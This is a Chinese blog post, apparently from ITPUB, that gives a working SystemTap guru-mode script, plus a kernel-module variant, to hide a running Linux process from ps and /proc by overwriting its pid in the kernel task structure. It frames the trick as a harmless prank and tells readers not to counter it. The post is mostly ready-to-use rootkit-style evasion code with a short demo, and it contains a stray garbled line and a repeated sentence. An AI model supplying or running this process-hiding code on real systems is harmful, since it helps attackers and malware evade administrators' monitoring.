一行程式碼如何隱藏Linux程式?
總有朋友問隱藏Linux程式的方法,我說你想隱藏到什麼程度,是大隱於核心,還是小隱於使用者。
網上通篇論述的無外乎 hook 掉 procfs 或者類似的使用者態方案,也都難免長篇大論,我說,這些場面都太大了,太複雜了。對於希望馬上看到效果的而言,看到這麼一堆複雜的東西,大機率望而卻步。
本文介紹一種將Linux程式小隱於使用者的非常規方法,僅僅一行程式碼:
修改掉程式的pid即可。
注意是小隱,所以,不值得反制,逗一下高階會議工程師搞個惡作劇玩玩得了。
target->pid = 0x7fffffff;
完整的指令碼如下:
#!/usr/bin/stap -g
# hide.stp
global pid;
function hide(who:long)
%{
struct task_struct *target;
target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);
target->pid = 0x7fffffff;
%}
probe begin
{
pid = $1
hide(pid);
exit();
}
ff;
來來來,試一下:
[root@localhost system]# ./tohide &
[1] 403
[root@localhost system]# ./hide.stp
[root@localhost system]#
用下面的命令可以檢測所有可顯示程式的二進位制檔案:
for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do
ls -l /proc/$pid/exe;
done
procfs裡沒了,ps當然就檢測不到了。
如果你覺得 guru 模式的 stap 怪怪的,那麼你完全可以編寫自己獨立的 Linux kernel module,採用修改完即退的方法:
target->pid = xxxx;
return -1;是不是比各種hook法簡單多了,所謂的動資料而不要動程式碼!
是不是比各種 hook 法簡單多了,所謂的動資料而不要動程式碼!
簡單的說一下原理:
task被建立的時候,根據其pid註冊procfs目錄結構。
展示procfs目錄結構的時候,遍歷task list以其pid作為key來查詢procfs目錄結構。
0x7fffffff(或者任何其它合理的值)根本沒有註冊過,當然無法顯示。
不多說。
再次宣告,不要試圖對本文所描述的方法進行反制,因為這麼簡單的東西根本不值得反制
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/70023145/viewspace-2924815/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 異常值檢測!最佳統計方法實踐(程式碼實現)!⛵
- 【伺服器資料恢復】LINUX誤刪除、格式化的資料恢復
- linux中什麼是使用者組?使用者與組的關係是什麼?
- 【伺服器資料恢復】linux下執行FSCK後無法掛載的資料恢復案例
- 【資料庫資料恢復】LINUX EXT3檔案系統下ORACLE資料庫誤操作導致資料丟失的資料恢復案例
- 【北亞資料恢復】LINUX執行FSCK之前需要做哪些準備才能保證資料安全?
- 【伺服器資料恢復】linux ext3檔案系統下誤刪除mysql資料庫的資料恢復案例
- 【伺服器資料恢復】LINUX誤刪除、誤格式化怎麼恢復資料?
- 10年資深架構師分享 | 普通程式設計師向架構師進階之路
- 低程式碼會使初級碼農失業嗎?
- 靜態應用程式安全測試
- Linux運維工程師的操作規範
- Avast報告:惡意程式偽裝成瀏覽器擴充套件外掛,目前已成功竊取13萬美元
- Kindling參加首屆CCF GitLink開源程式設計夏令營啦!快來報名吧
- CVE-2022-0847 Linux DirtyPipe核心提權漏洞
- Linux sudo 提權之軟連結攻擊
- Android打造專有hook,讓不規範的程式碼扼殺在萌芽之中